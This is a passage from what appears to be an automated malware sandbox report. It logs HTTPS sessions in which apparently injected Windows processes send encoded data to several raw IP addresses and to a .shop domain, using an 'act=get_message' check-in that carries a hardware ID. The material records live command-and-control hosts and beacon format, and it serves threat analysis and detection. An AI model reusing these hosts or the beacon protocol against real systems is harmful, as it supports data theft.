                                                                                    2024-07-24 17:57:02 UTC4096INData Raw: ca df f1 f8 f5 29 b3 67 0e 68 e3 11 02 e6 69 cd 6f 02 29 3a 1d 13 8b 42 6a ae 29 56 0d 16 51 aa 71 22 94 8c 40 98 e7 12 4e 4c c1 8d a4 1a ed d7 6b 74 01 ef 86 9c dd 5a 33 8e ea af 81 41 b7 9e cf c5 05 0f b7 e2 3e 45 48 b4 92 14 64 1b 37 f2 e0 b8 55 fb 1f f7 22 ad 10 11 e6 0f 86 53 1c 2a 30 42 90 d5 80 1d 8d 55 df 87 c0 c0 72 c4 76 c2 51 62 68 88 9f d2 c3 39 48 fd 7b 7f 34 c0 c2 c5 aa 8c d2 cc 42 6e b8 bf d4 7f 02 4e 21 a2 0f c8 7e ba 56 f5 49 4a f9 2e 20 d4 74 87 35 2c dd e7 03 29 bf 1d 9f 32 0d 2a e8 94 31 f4 8b a6 3c b0 3a 59 c2 0c f2 45 cd 02 0d de 7c d0 1b d4 2d 76 6d c0 d7 81 eb a0 80 18 ed f7 1b 10 80 84 33 c7 8a 5f 1c 2d 9f f8 63 47 1b 28 17 ba af b0 6c b7 aa 00 3a 17 27 16 f8 17 b2 3e 55 c2 ff 8d 76 40 d1 6e ab 85 6e b0 05 99 89 0e 7e 34 89 74 1c
                                                                                    Data Ascii: )ghio):Bj)VQq"@NLktZ3A>EHd7U"S*0BUrvQbh9H{4BnN!~VIJ. t5,)2*1<:YE|-vm3_-cG(l:'>Uv@nn~4t
                                                                                    2024-07-24 17:57:02 UTC4096INData Raw: 10 88 8a dc 89 ef 20 08 db d5 0a 8e df 18 35 80 b9 fb 0a 52 46 8a d4 73 22 6b 43 08 0e 33 29 73 52 01 1e 0b d5 4d 36 01 af 74 c2 28 99 a5 0b 15 9a 7c c0 6a fa 0a 60 b9 a2 52 80 37 72 fb 4d 1b 3a 3a d2 f2 e2 7c cc ef cf 52 b1 a7 14 0f ea 07 e4 81 cb 45 5d 3d 47 ac 01 51 5c 52 77 d4 0a 4c 59 53 5b f9 a8 e4 cf b9 0d dd a3 58 af ce 69 97 59 94 b7 15 c7 68 df 15 a5 8a e5 ff e0 61 40 74 ee 65 0e 70 53 10 cc 4c 3c f1 86 73 33 8d 9b 72 2c 32 66 86 c3 b3 f7 98 35 e5 9a a9 b0 e0 c8 28 2d 7c 4e 59 e0 c9 a2 1b 8f 23 d0 04 1c 46 f3 c4 8a 3f bf 3b 10 7c 58 25 a7 6f 1d a6 7d 90 e0 67 96 ea ae 9d b5 2c 1b ab a7 62 fc c9 10 9c 5b 85 83 61 35 01 5c 99 ef 12 e4 19 59 34 05 b0 5c 54 a7 e6 2f df 13 0c a6 e4 f5 ab 9a 4e 73 e2 a2 3e 34 43 6b ed 44 74 ec 94 88 32 d9 a6 1d 65 53
                                                                                    Data Ascii: 5RFs"kC3)sRM6t(|j`R7rM::|RE]=GQ\RwLYS[XiYha@tepSL<s3r,2f5(-|NY#F?;|X%o}g,b[a5\Y4\T/Ns>4CkDt2eS
                                                                                    2024-07-24 17:57:02 UTC1067INData Raw: d3 b4 a5 8e f5 69 fc 50 76 a7 e1 c7 40 74 33 d8 8d e3 79 4f 1e d2 37 57 1f 6a c1 37 67 20 a0 06 8d f8 3e 8a 0b 84 2d 15 3c 89 16 45 46 58 00 de d5 00 06 99 f6 79 a7 f9 a9 b3 a8 df bf 94 e3 95 76 58 3f ff 7b d0 ff ba 83 dc 60 f5 2d b7 31 fe 1e 5c a7 9d 64 2b a7 47 78 c7 bc ac 47 ef ed eb ff fc a7 68 94 c2 56 67 2f 75 a0 7f 54 6f 07 7a 48 2c 7a df ea b1 c4 2b 42 d6 9f 8d 53 23 db 8e 14 34 44 0e c7 fc 96 0e fa 2d 62 e0 57 d6 83 c8 32 d3 31 7b f3 bb 3b 24 01 e8 f0 f1 c6 d1 2a d7 1e c7 e8 bf 40 a7 a2 fa 6e da 59 f0 9c 1b 87 ab a0 79 16 b4 f0 da ab 78 57 f4 48 69 14 d5 b9 c7 1f c4 ad 96 1a 9b 86 4f bb 52 5a 65 9a 33 01 15 25 1d 66 e3 be 8a c5 1d f6 76 7a 4b 8d 0f 64 95 e7 b6 fc 80 c8 df 87 41 8b 0d 14 1a 5f ae 23 73 7a 86 b8 5f 27 05 b2 5a 0d 94 fb 31 e3 3d b3
                                                                                    Data Ascii: iPv@t3yO7Wj7g >-<EFXyvX?{`-1\d+GxGhVg/uTozH,z+BS#4D-bW21{;$*@nYyxWHiORZe3%fvzKdA_#sz_'Z1=
                                                                                    2024-07-24 17:57:02 UTC4096INData Raw: 46 94 44 d4 1a bd 3d 25 28 41 89 70 53 b6 3c 25 25 87 79 91 ae c9 a4 55 0a 23 67 fa 87 63 75 7b 9d 41 56 7d 7f 0e 4e 89 bb be d7 da 36 be 6b c3 a1 06 8d f0 93 52 17 4d 10 c9 99 ea 02 e6 50 f9 e5 21 9e 7a ef 7b 14 85 df e2 43 42 e9 89 3e ce 49 11 a4 e9 1a 9b e0 63 7f cf 38 7b c0 30 0b 4d fc c8 36 a5 a1 f7 ef 19 2e 9b c0 9b d0 2a e1 a0 99 2a 24 92 2a 4b b8 b9 af b7 fe 77 cf e1 c2 cc 81 d8 2c 3a b0 ae 03 5d 77 b6 cb 0c f1 65 48 4b ba 80 14 71 91 ae d1 00 d0 b1 96 cb 3a a3 5f 8f 40 b8 5c 01 01 50 23 32 f9 af 96 a9 bb de 1a 18 32 4e 69 af 4a ea 2f 61 0f 18 82 76 e8 02 27 0f a1 33 99 cf e2 7a c7 72 82 55 fc 2d 8a 31 61 85 7c 4f 50 24 40 e5 8f 80 8f b9 e4 4c 85 3e 7f fc 3c df 03 e3 72 0e c4 81 8e b1 72 e3 f8 be 34 52 88 59 35 e9 d8 eb a0 0d 01 54 78 c8 02 bd 1c
                                                                                    Data Ascii: FD=%(ApS<%%yU#gcu{AV}N6kRMP!z{CB>Ic8{0M6.**$*Kw,:]weHKq:_@\P#22NiJ/av'3zrU-1a|OP$@L><rr4RY5Tx


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    25192.168.2.1049771107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:02 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:57:02 UTC1267OUTData Raw: 71 38 70 77 64 6d 67 51 6a 74 63 53 58 52 4f 73 2b 6e 46 47 6c 37 44 4b 4b 58 50 39 44 38 44 57 52 38 47 45 78 34 57 68 62 71 4f 35 63 6b 70 36 33 67 78 51 53 42 6b 69 4b 30 59 39 7a 66 53 4e 69 6a 45 47 69 6a 72 4c 45 65 2b 52 38 67 38 43 47 55 74 47 76 38 6a 36 63 56 49 77 79 32 39 2f 6b 75 31 68 78 6c 50 49 65 67 47 79 46 5a 61 33 75 6e 38 58 68 7a 52 51 53 79 31 72 47 38 45 65 61 5a 58 4c 63 5a 58 2f 37 45 45 6c 51 6d 53 65 42 53 2f 79 4c 77 62 78 6e 6a 43 78 69 76 6c 67 53 41 49 51 74 5a 73 74 55 6b 53 66 69 39 39 69 70 5a 64 34 67 6a 7a 4d 63 55 54 53 42 2f 79 52 77 71 78 4b 44 35 2b 45 79 73 42 41 37 65 43 6a 35 37 2b 53 77 31 36 47 2f 5a 69 38 51 31 74 6b 7a 61 35 64 50 4a 4e 55 56 61 6e 62 50 78 4f 49 47 68 68 49 48 6e 69 59 54 50 68 34 52 56 50
                                                                                    Data Ascii: q8pwdmgQjtcSXROs+nFGl7DKKXP9D8DWR8GEx4WhbqO5ckp63gxQSBkiK0Y9zfSNijEGijrLEe+R8g8CGUtGv8j6cVIwy29/ku1hxlPIegGyFZa3un8XhzRQSy1rG8EeaZXLcZX/7EElQmSeBS/yLwbxnjCxivlgSAIQtZstUkSfi99ipZd4gjzMcUTSB/yRwqxKD5+EysBA7eCj57+Sw16G/Zi8Q1tkza5dPJNUVanbPxOIGhhIHniYTPh4RVP
                                                                                    2024-07-24 17:57:04 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:03 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:04 UTC685INData Raw: 49 32 6d 30 61 74 51 6f 38 31 5a 4f 62 7a 48 69 72 74 76 46 72 64 51 39 65 41 44 47 57 71 4b 4c 50 78 63 41 77 79 4c 46 32 4a 48 48 6e 41 75 5a 57 72 45 76 77 70 41 35 70 36 63 41 75 38 50 6e 33 33 78 54 41 52 66 6e 45 44 50 32 50 65 67 4a 6f 45 56 43 55 46 56 65 38 59 5a 56 56 4d 78 69 47 6f 70 41 54 77 78 64 6d 70 4a 37 48 59 42 52 37 51 58 2f 42 4f 66 75 58 69 78 56 39 6e 77 54 53 71 6e 71 53 52 4c 57 72 56 77 65 74 7a 54 55 36 2b 79 41 67 4e 4e 75 68 33 4a 73 57 32 6c 42 49 4f 4e 4c 38 51 79 4e 6c 61 33 55 50 36 51 55 79 62 2b 38 48 34 42 30 75 33 54 4a 74 6d 61 30 44 44 70 51 44 77 32 4f 75 70 48 67 2f 69 48 2f 75 36 52 77 50 75 31 47 32 46 6d 63 44 59 48 5a 6a 33 2f 75 6b 4d 57 4f 4c 34 6f 59 43 78 4f 6b 48 34 62 4c 66 51 65 34 4c 64 49 70 70 34 59
                                                                                    Data Ascii: I2m0atQo81ZObzHirtvFrdQ9eADGWqKLPxcAwyLF2JHHnAuZWrEvwpA5p6cAu8Pn33xTARfnEDP2PegJoEVCUFVe8YZVVMxiGopATwxdmpJ7HYBR7QX/BOfuXixV9nwTSqnqSRLWrVwetzTU6+yAgNNuh3JsW2lBIONL8QyNla3UP6QUyb+8H4B0u3TJtma0DDpQDw2OupHg/iH/u6RwPu1G2FmcDYHZj3/ukMWOL4oYCxOkH4bLfQe4LdIpp4Y


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    26192.168.2.1049772188.114.96.34434216C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:04 UTC268OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 77
                                                                                    Host: callosallsaospz.shop
                                                                                    2024-07-24 17:57:04 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 62 4f 4b 48 4e 4d 2d 2d 26 6a 3d 26 68 77 69 64 3d 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38
                                                                                    Data Ascii: act=get_message&ver=4.0&lid=bOKHNM--&j=&hwid=8F2C114769E59A360D3FAAA1B508DF78
                                                                                    2024-07-24 17:57:05 UTC806INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:57:04 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=h2d9bq1hjnpckfmsvfp05r6pc5; expires=Sun, 17-Nov-2024 11:43:43 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n5h0PsYkigl72qKl12bgzIRUeu%2BmFbebqVGOT9AkTNLotr5nMgN2mKe0ju8ZHGxrCvKFffdxdocdyXR4A99guxwYKm8LfCn1lvy7RUUXIKVd5I%2FvoF1cNKwqraPz5X8jbSRpFBhlRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85ca5e4e61c457-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-07-24 17:57:05 UTC54INData Raw: 33 30 0d 0a 69 59 45 59 79 43 6b 37 2f 6a 6d 49 36 7a 6a 32 58 45 4d 38 6c 4e 46 59 6f 4f 68 4f 77 49 38 6d 70 64 57 7a 36 6b 70 45 39 56 44 53 33 41 3d 3d 0d 0a
                                                                                    Data Ascii: 30iYEYyCk7/jmI6zj2XEM8lNFYoOhOwI8mpdWz6kpE9VDS3A==
                                                                                    2024-07-24 17:57:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    27192.168.2.1049773107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:04 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:04 UTC1122OUTData Raw: 6e 32 52 52 67 38 51 37 54 71 34 43 64 77 49 6f 54 6c 33 79 51 30 4f 47 73 52 34 4a 4b 37 4a 44 48 56 5a 50 53 36 71 4f 6f 31 49 58 33 57 6e 70 53 59 4b 52 50 4e 6c 4a 78 61 6b 6b 4b 72 7a 4c 47 4f 47 31 49 43 2b 47 35 48 4c 39 30 6d 32 2b 71 74 4b 63 38 46 47 49 37 55 34 55 71 4a 56 6b 6b 68 5a 66 73 58 55 74 2f 50 4e 64 42 42 37 75 39 49 37 2f 65 30 2b 67 4e 6d 37 41 42 76 72 47 6a 5a 46 59 78 36 38 4d 6e 31 54 4f 4c 72 47 39 6c 42 38 6b 47 6a 47 55 48 39 5a 37 44 65 38 31 31 2b 30 4a 44 38 69 2f 76 42 50 77 63 6d 7a 78 56 61 43 4f 79 39 6c 70 53 39 42 44 57 52 4a 30 38 51 74 75 2b 53 34 5a 2b 4a 4c 70 6b 2f 59 71 48 70 53 6c 4b 77 68 46 34 45 38 78 31 68 4a 48 69 51 71 35 69 70 77 48 45 35 46 30 6c 72 71 33 34 70 37 55 53 32 4d 58 41 71 4e 66 46 69 4b
                                                                                    Data Ascii: n2RRg8Q7Tq4CdwIoTl3yQ0OGsR4JK7JDHVZPS6qOo1IX3WnpSYKRPNlJxakkKrzLGOG1IC+G5HL90m2+qtKc8FGI7U4UqJVkkhZfsXUt/PNdBB7u9I7/e0+gNm7ABvrGjZFYx68Mn1TOLrG9lB8kGjGUH9Z7De811+0JD8i/vBPwcmzxVaCOy9lpS9BDWRJ08Qtu+S4Z+JLpk/YqHpSlKwhF4E8x1hJHiQq5ipwHE5F0lrq34p7US2MXAqNfFiK
                                                                                    2024-07-24 17:57:06 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:06 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:06 UTC685INData Raw: 6c 58 35 39 65 49 4f 6f 75 7a 30 51 70 6a 46 32 4f 30 51 53 47 45 6f 7a 30 53 48 77 67 4e 55 7a 63 6a 33 31 4e 57 33 4b 6a 54 4a 79 79 53 34 55 44 38 4a 49 76 4b 54 73 5a 59 69 4c 6e 79 75 6c 77 65 67 38 66 62 46 53 41 43 30 49 79 4f 67 4d 4f 63 6d 49 4c 43 35 79 49 78 75 72 53 6f 53 64 56 4d 2f 58 56 30 41 58 2f 77 4d 62 6f 53 4d 34 37 68 58 64 49 58 76 38 4a 50 57 69 6e 36 76 61 71 66 75 76 5a 31 62 4d 6d 6d 53 55 48 32 63 75 42 39 6d 49 30 48 46 6f 51 35 36 57 4c 45 61 6a 46 57 62 39 32 30 4f 45 46 44 52 36 5a 38 73 64 58 61 30 53 78 73 76 6c 67 4c 50 69 30 64 30 6d 59 79 52 35 49 45 43 6a 53 44 6f 71 30 33 69 31 66 46 31 36 4b 2b 71 61 48 4a 4d 49 41 58 42 6d 76 62 59 6f 35 33 59 4d 35 53 30 46 64 46 34 55 4a 6d 52 41 38 68 2f 65 4e 47 6d 78 72 78 65
                                                                                    Data Ascii: lX59eIOouz0QpjF2O0QSGEoz0SHwgNUzcj31NW3KjTJyyS4UD8JIvKTsZYiLnyulweg8fbFSAC0IyOgMOcmILC5yIxurSoSdVM/XV0AX/wMboSM47hXdIXv8JPWin6vaqfuvZ1bMmmSUH2cuB9mI0HFoQ56WLEajFWb920OEFDR6Z8sdXa0SxsvlgLPi0d0mYyR5IECjSDoq03i1fF16K+qaHJMIAXBmvbYo53YM5S0FdF4UJmRA8h/eNGmxrxe


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    28192.168.2.1049774167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:06 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:57:06 UTC1267OUTData Raw: 63 35 62 72 4f 70 6f 44 4f 69 4f 4e 72 66 31 39 6f 76 68 73 39 78 70 35 37 63 31 31 4e 33 33 6a 78 72 73 7a 6d 63 45 55 33 44 6e 41 39 7a 47 71 49 71 51 64 58 4c 32 74 34 4f 75 4e 53 51 67 41 71 76 47 52 4f 34 47 5a 69 62 44 2b 48 46 36 2b 2f 4e 7a 63 52 6c 43 66 6c 69 66 6c 69 69 76 64 2b 35 64 4c 58 51 78 71 34 72 74 6c 78 30 46 51 49 4a 61 50 6e 7a 4c 56 63 38 79 77 62 46 33 52 6b 49 50 2f 4a 6b 37 4b 66 53 66 62 30 2f 52 77 70 37 49 52 4e 63 61 58 4a 30 72 46 54 48 32 50 43 6b 72 61 62 2b 31 55 34 77 47 59 79 77 77 57 74 50 52 32 4a 68 6e 71 78 51 37 48 34 63 2f 33 50 56 70 38 62 34 43 38 4b 4b 68 58 51 39 50 42 36 5a 42 79 42 53 55 47 50 66 79 50 49 2b 67 62 37 75 4b 78 55 62 63 35 56 35 49 32 74 33 66 77 71 53 78 56 68 63 52 4c 47 4c 46 56 62 56 54
                                                                                    Data Ascii: c5brOpoDOiONrf19ovhs9xp57c11N33jxrszmcEU3DnA9zGqIqQdXL2t4OuNSQgAqvGRO4GZibD+HF6+/NzcRlCflifliivd+5dLXQxq4rtlx0FQIJaPnzLVc8ywbF3RkIP/Jk7KfSfb0/Rwp7IRNcaXJ0rFTH2PCkrab+1U4wGYywwWtPR2JhnqxQ7H4c/3PVp8b4C8KKhXQ9PB6ZByBSUGPfyPI+gb7uKxUbc5V5I2t3fwqSxVhcRLGLFVbVT
                                                                                    2024-07-24 17:57:07 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:07 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:07 UTC685INData Raw: 5a 42 43 36 59 46 72 58 4f 35 72 57 53 61 76 39 31 68 6b 54 6b 35 45 51 67 69 63 4b 59 67 35 4b 49 33 38 74 71 79 75 4e 51 51 2f 31 36 67 42 57 65 52 2b 35 65 74 5a 54 6d 35 64 69 4e 37 35 7a 32 48 4c 39 37 6c 35 43 30 4b 44 4f 50 51 4a 6d 43 46 76 57 34 74 4a 79 63 66 57 57 30 63 77 35 5a 7a 38 6e 75 2b 43 41 36 48 39 4e 6a 42 4a 6d 2b 48 47 50 72 71 48 2f 68 6a 37 45 75 67 4a 34 6f 50 66 79 63 38 63 5a 37 68 46 53 55 79 67 72 76 53 6d 57 6a 50 79 75 50 4e 7a 4d 49 58 72 2b 52 62 61 49 33 73 70 56 78 7a 71 32 41 68 44 59 57 49 53 37 76 4b 47 75 51 71 34 6a 52 6c 4e 74 43 41 38 64 67 63 68 62 42 37 37 5a 76 4d 30 59 31 50 5a 42 75 52 34 49 76 6a 59 32 6d 5a 2b 47 61 4b 30 53 70 6c 50 49 49 4f 47 70 4f 76 30 42 33 4f 76 72 47 62 49 72 6b 36 30 32 55 32 76
                                                                                    Data Ascii: ZBC6YFrXO5rWSav91hkTk5EQgicKYg5KI38tqyuNQQ/16gBWeR+5etZTm5diN75z2HL97l5C0KDOPQJmCFvW4tJycfWW0cw5Zz8nu+CA6H9NjBJm+HGPrqH/hj7EugJ4oPfyc8cZ7hFSUygrvSmWjPyuPNzMIXr+RbaI3spVxzq2AhDYWIS7vKGuQq4jRlNtCA8dgchbB77ZvM0Y1PZBuR4IvjY2mZ+GaK0SplPIIOGpOv0B3OvrGbIrk602U2v


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    29192.168.2.1049775107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:08 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:08 UTC1122OUTData Raw: 6d 79 74 67 6c 34 68 52 79 49 38 6a 73 71 32 31 56 38 62 51 67 65 47 53 57 43 39 4d 4b 52 44 52 35 39 63 50 6f 37 63 4c 30 38 4c 6b 32 61 51 6f 50 65 4e 42 68 55 49 78 7a 2f 34 49 6e 42 46 75 7a 63 55 57 4f 44 77 37 78 43 61 6b 33 70 75 65 65 4a 47 4c 4c 53 54 76 38 6d 34 53 44 44 6b 59 61 6d 6f 2f 42 6d 57 47 4f 6e 77 4c 34 5a 58 67 70 35 48 76 42 4e 51 6e 2f 45 38 78 34 46 78 44 51 4e 39 69 2b 5a 57 65 47 76 46 62 50 49 76 2f 63 59 6f 38 78 62 72 33 5a 38 51 53 31 75 71 4e 64 55 44 59 48 6e 75 35 51 2b 4e 4d 7a 37 71 55 77 73 45 51 59 30 63 6f 77 58 76 44 77 58 4b 45 58 38 61 4d 47 6d 46 4d 6f 38 77 6f 31 61 43 51 2f 52 48 64 56 49 46 65 37 6d 69 57 75 38 4a 5a 4e 65 41 57 74 42 57 65 2f 7a 4e 2b 31 70 34 51 2b 31 37 5a 68 78 46 73 46 38 46 73 2f 56 74
                                                                                    Data Ascii: mytgl4hRyI8jsq21V8bQgeGSWC9MKRDR59cPo7cL08Lk2aQoPeNBhUIxz/4InBFuzcUWODw7xCak3pueeJGLLSTv8m4SDDkYamo/BmWGOnwL4ZXgp5HvBNQn/E8x4FxDQN9i+ZWeGvFbPIv/cYo8xbr3Z8QS1uqNdUDYHnu5Q+NMz7qUwsEQY0cowXvDwXKEX8aMGmFMo8wo1aCQ/RHdVIFe7miWu8JZNeAWtBWe/zN+1p4Q+17ZhxFsF8Fs/Vt
                                                                                    2024-07-24 17:57:09 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:09 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:09 UTC685INData Raw: 57 4c 6f 4f 72 56 41 6b 61 6e 55 62 53 4e 53 2b 66 58 42 41 30 69 5a 33 65 55 54 6d 46 77 6b 69 7a 44 75 43 62 48 4b 74 6e 79 6f 51 4f 4c 54 72 41 63 68 32 73 6f 32 47 35 6b 52 4c 69 71 63 48 48 74 43 6d 65 5a 39 7a 5a 63 6e 73 30 4d 52 53 2b 71 70 77 72 55 6d 56 42 66 42 75 78 34 6a 2b 48 44 77 6d 31 6f 51 66 39 6b 41 4f 31 2b 50 58 68 54 33 4f 64 6f 42 49 72 59 4f 4b 37 50 69 34 71 55 41 72 54 30 44 5a 54 34 4a 6c 50 56 68 6b 30 45 77 39 57 74 52 35 44 50 78 75 44 68 65 63 72 75 74 4c 6f 7a 54 57 68 66 6e 4a 68 68 62 42 4e 42 6e 37 6c 41 7a 78 33 49 4e 54 6b 55 70 57 31 67 42 33 4e 58 6b 4f 4d 73 75 51 7a 57 58 6d 30 30 31 67 61 74 35 34 68 63 2b 33 66 6e 34 70 4d 2f 48 4a 50 54 32 50 49 2b 38 32 4e 49 37 73 6b 66 4e 64 77 6e 61 49 38 70 78 58 4c 4b 46
                                                                                    Data Ascii: WLoOrVAkanUbSNS+fXBA0iZ3eUTmFwkizDuCbHKtnyoQOLTrAch2so2G5kRLiqcHHtCmeZ9zZcns0MRS+qpwrUmVBfBux4j+HDwm1oQf9kAO1+PXhT3OdoBIrYOK7Pi4qUArT0DZT4JlPVhk0Ew9WtR5DPxuDhecrutLozTWhfnJhhbBNBn7lAzx3INTkUpW1gB3NXkOMsuQzWXm001gat54hc+3fn4pM/HJPT2PI+82NI7skfNdwnaI8pxXLKF


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    30192.168.2.1049776107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:10 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:57:10 UTC1267OUTData Raw: 53 70 6d 68 47 6c 74 46 62 49 78 67 56 51 39 63 42 79 5a 43 72 37 34 4b 75 58 47 6b 37 30 32 72 4d 4c 68 37 52 2b 4a 2b 59 6c 39 65 43 76 49 77 76 56 71 72 66 4c 69 4f 35 55 72 66 35 37 77 4f 6d 69 44 61 74 76 72 2f 68 59 36 72 34 59 36 30 34 50 75 42 62 71 4e 74 46 2f 39 66 61 6a 43 50 49 33 4d 2b 6b 6c 6a 53 57 59 45 45 58 4f 52 4e 4a 55 34 32 43 2b 72 57 55 42 2b 67 41 31 63 32 5a 4a 7a 58 70 57 2f 43 76 57 6f 4e 46 6e 70 6d 45 6e 63 52 44 67 50 54 61 6b 70 52 50 49 33 39 4a 73 53 79 61 7a 66 62 47 4e 38 4d 49 54 6c 51 39 48 52 45 5a 73 63 58 70 44 58 43 79 70 6f 59 78 65 34 61 4a 44 4e 76 6b 66 62 62 41 42 66 52 34 4b 5a 38 35 42 7a 2b 43 47 38 70 2f 71 4e 47 53 51 64 66 4d 59 6d 2b 65 2b 32 68 4b 46 4a 76 63 44 43 62 6a 47 49 6b 4c 4b 58 41 6f 45 6e
                                                                                    Data Ascii: SpmhGltFbIxgVQ9cByZCr74KuXGk702rMLh7R+J+Yl9eCvIwvVqrfLiO5Urf57wOmiDatvr/hY6r4Y604PuBbqNtF/9fajCPI3M+kljSWYEEXORNJU42C+rWUB+gA1c2ZJzXpW/CvWoNFnpmEncRDgPTakpRPI39JsSyazfbGN8MITlQ9HREZscXpDXCypoYxe4aJDNvkfbbABfR4KZ85Bz+CG8p/qNGSQdfMYm+e+2hKFJvcDCbjGIkLKXAoEn
                                                                                    2024-07-24 17:57:11 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:11 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:11 UTC685INData Raw: 6c 73 44 70 43 54 72 69 6d 67 37 32 5a 78 73 4f 65 62 54 5a 69 50 38 38 39 53 6d 31 75 43 4a 67 35 4b 62 75 44 30 4c 51 56 34 61 4d 74 55 34 42 51 55 37 69 38 50 6c 49 6d 41 63 58 61 6f 42 31 38 33 47 4f 47 70 66 70 57 6c 6e 71 67 4c 50 50 4b 39 6a 4a 42 55 6a 4f 73 4d 35 46 41 58 73 47 61 72 5a 6e 69 34 36 2b 59 2f 4f 72 2b 6c 65 72 63 42 42 46 45 70 73 6f 36 6c 57 6a 59 47 6d 49 79 39 57 63 46 4a 38 71 53 67 45 71 65 6e 76 72 4e 38 67 35 75 4f 35 51 4e 79 61 6a 6d 6a 47 76 37 75 47 46 74 76 4d 68 73 51 56 63 36 31 57 77 2b 51 4e 66 7a 35 78 6e 4a 47 66 67 6a 5a 72 44 51 48 68 71 36 45 73 42 64 4d 43 77 37 36 53 6f 4e 72 79 30 78 37 63 43 4e 4c 66 39 79 6d 53 4c 58 45 6a 48 43 45 4e 6a 71 73 62 64 76 45 70 50 32 36 54 57 64 35 57 31 47 68 2b 69 30 6f 37
